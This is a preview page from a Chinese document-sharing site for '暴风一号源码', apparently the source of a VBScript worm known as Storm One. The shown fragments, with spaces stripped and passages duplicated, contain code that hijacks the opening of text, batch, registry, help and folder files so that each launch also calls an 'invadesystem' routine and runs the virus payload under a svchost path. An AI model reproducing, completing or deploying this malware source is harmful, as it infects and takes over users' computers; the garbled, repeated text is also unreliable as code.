欢迎来到天天文库
浏览记录
ID:37672871
大小:46.50 KB
页数:15页
时间:2019-05-28
《暴风一号源码》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、onerrorresumenextdimfso,wshshellsetfso=createobject("scripting.filesystemobject")setwshshell=createobject("wscript.shell")callmain()submain()onerrorresumenextdimargs,virusload,virusasssetargs=wscript.argumentsvirusload=getmainvirus(1)virusass=getmainvirus(0)argnum=0dowhile
2、argnum3、log","ini","inf"runpath="%systemroot%system32otepad.exe"¶mcallrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"bat","cmd"runpath="cmd/cechohi!i'mhere!&pause"callrun(runpath)callinvadesystem(virusload,virusass)c4、allrun("%systemroot%systemsvchost.exe"&virusload)case"reg"runpath="regedit.exe"&""""&trim(param)&""""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"chm"runpath="hh.exe"&""""&trim(param)&""""callrun(runpath)cal5、linvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"hlp"runpath="winhlp32.exe"&""""&trim(param)&""""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"dir"runpath=""""&left(trim6、(param),len(trim(param))-3)&""""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"oie"runpath="""%programfiles%internetexploreriexplore.exe"""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemro7、ot%systemsvchost.exe"&virusload)case"omc"runpath="explorer.exe/n,::{20d04fe0-3aea-1069-a2d8-08002b30309d}"callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"emc"runpath="explorer.exe/n,/e,::{20d04fe0-3aea-1069-a2d8、8-08002b30309d}"callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%
3、log","ini","inf"runpath="%systemroot%system32otepad.exe"¶mcallrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"bat","cmd"runpath="cmd/cechohi!i'mhere!&pause"callrun(runpath)callinvadesystem(virusload,virusass)c
4、allrun("%systemroot%systemsvchost.exe"&virusload)case"reg"runpath="regedit.exe"&""""&trim(param)&""""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"chm"runpath="hh.exe"&""""&trim(param)&""""callrun(runpath)cal
5、linvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"hlp"runpath="winhlp32.exe"&""""&trim(param)&""""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"dir"runpath=""""&left(trim
6、(param),len(trim(param))-3)&""""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"oie"runpath="""%programfiles%internetexploreriexplore.exe"""callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemro
7、ot%systemsvchost.exe"&virusload)case"omc"runpath="explorer.exe/n,::{20d04fe0-3aea-1069-a2d8-08002b30309d}"callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%systemsvchost.exe"&virusload)case"emc"runpath="explorer.exe/n,/e,::{20d04fe0-3aea-1069-a2d
8、8-08002b30309d}"callrun(runpath)callinvadesystem(virusload,virusass)callrun("%systemroot%
此文档下载收益归作者所有